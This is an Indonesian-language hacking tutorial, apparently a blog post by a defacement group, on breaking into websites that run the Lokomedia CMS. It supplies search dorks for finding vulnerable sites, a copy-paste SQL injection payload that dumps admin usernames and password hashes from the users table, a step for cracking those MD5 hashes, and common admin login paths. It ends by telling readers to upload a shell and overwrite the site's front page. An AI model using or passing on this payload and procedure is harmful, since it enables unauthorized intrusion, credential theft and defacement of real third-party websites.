Belajar deface poc sql lokomedia with FR13NDS CYBER ARMY

Cara Deface Website Metode SQL Lokomedia

 Helloww despenser 2k19 :v, pada kesempatan kali ini, mimin MR.CR0T_D1LU4R akan memberikan sedikit tutorial hacking website atau yang biasa disebut dengan deface. Deface adalah metode hacking dengan cara mengubah tampilan website default menjadi tampilan milik defacer, dan poc atau metode deface pun beragam. Tapi pada tutorial kali ini, admin memberikannya memakai poc atau Teknik SQL Lokomedia.

Tapi sebelum lanjut, bagi kalian yg belum ikutin aktifitas FRI3NDS CYBER ARMY di instagram, bisa langsung follow aja @officialfca
Oke next asu

Website-website Indonesia kebanyakan memakai CMS Lokomedia, jadi teknik atau poc SQL Lokomedia adalah metode yang tepat untuk tebas tu web :v, sebelumnya, ada beberapa alat dan bahan yang perlu kalian siapkan, diantaranya.
  • Dork ( pastinya asu)
  • Script Deface (Wajib)
  • MD5 Decrypter
  • Koneksi Internet (Serah lu ajg :v)
  • Kopi (Udud nya jangan lupa :v)
Untuk dork dan scriptnya nanti akan mimin kasih, santuyy simak saja tutorial dibawah ini.

Deface Metode SQL Lokomedia


#1. Silahkan dorking dengan search engine, gunakan saja chrome agar lebih fast, untuk dorknya bisa memakai dork dibawah ini.
  • inurl:statis-1-pengantar.html
  • inurl:statis-1/profil.html
  • inurl:statis-19-beasiswa.html
  • inurl:statis-22-kerjasama.html
  • inurl:kategori-23-hiburan.html
  • inurl:/statis-3-profil.html
  • inurl:statis-2/visi-dan-misi.html
  • Kembangin Lagi Agar Vuln dan Perawan :'v
Nggak tau cara dorking? Mending balik lgi ae lu jadi sperma :v
#2. Setelah itu, kalian akan masuk ke halaman statis pada website tersebut. Silahkan kalian masukan Exploit pada link halaman tersebut, untuk Exploitnya, bisa copas ni cuk

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Jika kalian masukan Exploit tersebut pada link websitenya, akan terlihat kaya gini ni asw,
http://site.com/statis-'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+1-profil.html

#3. Selanjutnya, akan terlihat sudah username dan password pada "Title" webite itu cuk

#4. Agar akun login website terlihat semua, kalian "View Source" saja atau bisa menekan tombol "CTRL +U" pada perangkat kalian. Cari bagian <title>. Lalu ada username dan passwordnya, tetapi passwordnya masih berbentuk sebuah kode. Kode tersebut akan kita decryptkan.

Source Admin Login Lokomedia

#5. Copy passwordnya yang berupa kode tersebut, dan pastekan pada MD5 Decrypter di HashKiller Decrypter. Masukan passwordnya, lalu masukan captcha, dan terakhir submit, dan lihat hasil passwordnya pada bagian sebelah kanan.


#6. Selanjutnya, login admin pada website tersebut, untuk loginnya kalian bisa menggunakan beberapa permalink dibawah ini.
  • http://site.com/admin
  • http://site.com/adminweb
  • http://site.com/administrator
  • http://site.com/redaktur
  • http://site.com/cp-admin
  • http://site.com/panel

Pilih salah satu halaman login tersebut, jika tidak bisa, cari yang lain, dan jika tidak dapat juga, kalian bisa memakai aplikasi "Admin Login Finder".



#7. Setelah berhasil kalian masuk kedalam halaman admin pada website tersebut, kalian bisa mengakses direktori dan upload shell dan kalian bisa langsung tuntaskan menebas index.


#8 ikutin aktifitas kami di youtube dan instagram

Youtube: Klik disini, MR.CR0T_D1LU4R GANS (Jangan lupa like coment and SUBSCRIBE)

Instagram: @Bangsad420

Belum ada Komentar untuk "Belajar deface poc sql lokomedia with FR13NDS CYBER ARMY"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel